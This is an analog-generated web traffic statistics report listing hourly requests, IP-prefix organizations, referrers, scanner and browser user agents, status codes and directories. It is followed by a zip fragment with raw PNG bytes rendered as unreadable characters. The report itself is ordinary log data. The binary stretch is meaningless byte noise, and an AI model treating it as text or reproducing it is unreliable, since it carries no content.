class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 9</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">12</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">14</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">15</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">16</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">6</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">18</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">19</td><td class="R">64</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">21</td><td class="R">24</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">23</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">196</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">38</td><td class="b">22.32%</td><td class="xl">205.169</td></tr> <tr><td class="R">22</td><td class="b">10.27%</td><td class="xl">34</td></tr> <tr><td class="R">13</td><td class="b"> 7.09%</td><td class="xl">35</td></tr> <tr><td class="R">10</td><td class="b"> 5.99%</td><td class="xl">54</td></tr> <tr><td class="R">10</td><td class="b"> 3.78%</td><td class="xl">167.94</td></tr> <tr><td class="R">10</td><td class="b"> 3.86%</td><td class="xl">206.168</td></tr> <tr><td class="R">9</td><td class="b"> 4.50%</td><td class="xl">123</td></tr> <tr><td class="R">6</td><td class="b"> 3.15%</td><td class="xl">27</td></tr> <tr><td class="R">4</td><td class="b"> 2.35%</td><td class="xl">185.177</td></tr> <tr><td class="R">4</td><td class="b"> 2.26%</td><td class="xl">157.230</td></tr> <tr><td class="R">4</td><td class="b"> 3.04%</td><td class="xl">198.235</td></tr> <tr><td class="R">4</td><td class="b"> 3.11%</td><td class="xl">205.210</td></tr> <tr><td class="R">3</td><td class="b"> 5.87%</td><td class="xl">93</td></tr> <tr><td class="R">3</td><td class="b"> 1.65%</td><td class="xl">101</td></tr> <tr><td class="R">3</td><td class="b"> 0.12%</td><td class="xl">194.87</td></tr> <tr><td class="R">3</td><td class="b"> 0.79%</td><td class="xl">44</td></tr> <tr><td class="R">3</td><td class="b"> 1.89%</td><td class="xl">64.227</td></tr> <tr><td class="R">2</td><td class="b"> 0.10%</td><td class="xl">16</td></tr> <tr><td class="R">2</td><td class="b"> 0.10%</td><td class="xl">18</td></tr> <tr><td class="R">2</td><td class="b"> 0.74%</td><td class="xl">72</td></tr> <tr><td class="R">41</td><td class="b">17.01%</td><td class="xl">[not listed: 30 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">13</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">44</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">26</td><td class="P">26</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">7</td><td class="P">5</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">3</td><td class="P">1</td><td class="xl">python-httpx/0.28.1</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0</td></tr> <tr><td class="R">2</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">111</td><td class="P">58</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">99</td><td class="P">46</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">12</td><td class="P">12</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">50</td><td class="P">40</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">8</td><td class="P">8</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/126</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr><td class="N">4</td><td class="R">7</td><td class="P">5</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">5</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">5</td><td class="R">4</td><td class="P">4</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">6</td><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla</td></tr> <tr><td class="N">7</td><td class="R">3</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N"> </td><td class="R">3</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">68</td><td class="P">51</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">43</td><td class="P">27</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">27</td><td class="xl"> Linux</td></tr> <tr><td class="N">3</td><td class="R">31</td><td class="P">23</td><td class="xl">Macintosh</td></tr> <tr><td class="N">4</td><td class="R">46</td><td class="P">17</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">39</td><td class="P">14</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">3</td><td class="xl"> Unknown Windows</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">196</td><td class="xl">200 OK</td></tr> <tr><td class="R">23</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">107</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">13</td><td class="b"> 0.64%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">128</td><td class="b">43.98%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">55</td><td class="b">55.38%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">126</td><td class="b">57.98%</td><td class="xl">[directories]</td></tr> <tr><td class="R">33</td><td class="b">29.17%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">12</td><td class="b"> 9.26%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">12</td><td class="b"> 2.97%</td><td class="xl">.svg</td></tr> <tr><td class="R">13</td><td class="b"> 0.64%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">126</td><td class="b">57.98%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">57</td><td class="b">41.39%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">13</td><td class="b"> 0.64%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">126</td><td class="b">57.98%</td><td class="D">Sep/30/25 10:38 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">19</td><td class="b"> 9.04%</td><td class="D">Sep/27/25 12:22 AM</td><td class="xl"> <a href="/?192.175.111.253">/?192.175.111.253</a></td></tr> <tr><td class="R">70</td><td class="b">42.02%</td><td class="D">Sep/27/25 12:22 AM</td><td class="xl">[not listed: 10 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[4�BT) ) dir.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx���[v�8`iR��>��d�s����+�$0t�_#��ۧ'f��*l�b��C̗�:������c�J�>�7�1ַ��i���"���X@ca, ����0��X@ca, ����0��K��X��,�\���U�b,�o�!?��]�n����~��X��O��U�%�TK�櫫 K���P]-k�Xڷ�`5(�ԏG����{j@�EF��V[��k�0�O�s��k��u�Q�Kn�bX�&����ֽ�N�cz0��b'��B=h��j��X��y���AP�bV)��^���+�E[v��?�w��X,�ؚ�d`�聅v><$���aƖ����ϵX�>c5�����`��V+�q{�M�`�V+?�XJ��.n�Bj%�b��p��[�X����ʎ�����Q(���h�T�X�&�c��ֲ�,� K�%�a��A�}*�J6!+ӈ$,w��d�X�&$`e1�e��7:,�*�J7!+݈���c��x��Fw��V�ϳއE�������L,��kN)+���M,V3�5�\ҰZY�Ic����Ȫi+_X4�FJ�t,{'���^�$V�THƊ���#U��I �0��X�bK.6\�Єd�h#zX�+����T�e_�(�t5-f�=��"u!+6�<���KW��,yz��H���KĊ���F���2�~y~a%�h�ENJ��K� �[�a������ҕ�e���.L`Ѻ����5��"��)�4���"�.�Kص����u�D��]`]��t�ZX��K���İ�]�`]�#X��B��i������}ͦ��`��� ��5�ʩ7a,zaaX��b�R,����RU~�1�E�B+Ї��rX�� �˭^�HU'��ur���bm�� Kͫ}�%���-���q�J�uV� a!]�b]��4ca, !�ہX�^�ٍ��]cA]c]�c `�ź��b, �d��,��C���l�nc]�ca, �d���q��ca, ���Xם����0��ƂO�X�=2��X��a, ����0��X@ca, �d�u{�e�h�W��~+��ٍUЅ��X��]�X�EHA2cRЅ�b�c1V>%]�X��MQ���4y�UWhvbu!c1�1]�X}b!�ò.���pVaa1V�X��*���,�B�������¦�ȧ�B��w`�vaSX�>�I1Vi6�EZ��r��.d,�:�[�"M��{�/��K���B�BR�Uڅ�a&|1֕�{�[��م�������B�BR�U܅Mbe�V�#��mF;��"�^����~{�¢7��I+ч�va+QZ].��`uۅq�xv��lŊ�V�]X��o&�b}�o&�"��q2�V�;��V��:��gRX����۲�y�~��:$),�_օMVk;���� ?i�M#v�Ss��X]wakӇ���"�Uiva�B��Z�;�u*�䰖���/�X'�%wc5SXVY�2�X����m���VQ63�HXrWa�ӄ$�g#v�;IC�`M�X�jB"���b5eE�rc��[X��e�VG�� ˌ-��X��5�-�5+2��p66��%�7�mm` Kh�usMa �u ��{P�X�N�i��%$I�M*K�|+�&� ��mşf�J�ҭ��K?XC+�zQ7:�ǔ` r�܁6�X��wWUeR�e���O�Ue�k���K�ُ�Qca, ����0��X@ca, ��d�z��8�Ry�� W7ȿΖj}UV��۾���%����^��� T���S�U8�R��j������z���������ym1�-�2�l�;s��lvS�c�/H����h�=������p�c�������0�Q��74����� �tWJ�F����)�U�9���m8�-)��7��`�a�ew+���� ��>a=�P�}�ʪ�*��>4��Y_�������+KxX��b�7��"Xϻ��}��cS}�kI�����d�q�C=�d�%7XՁ���3[z�2�g 1nwO��?�T�&5�X>��nb�m�R� �"���'�5UQ{e��KeE��kC ����0��X@ca, ����0��X@���R��'�����샸J�| .,r>9�&��h��[ IEND�B`�PK HG�[��n� � 10.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 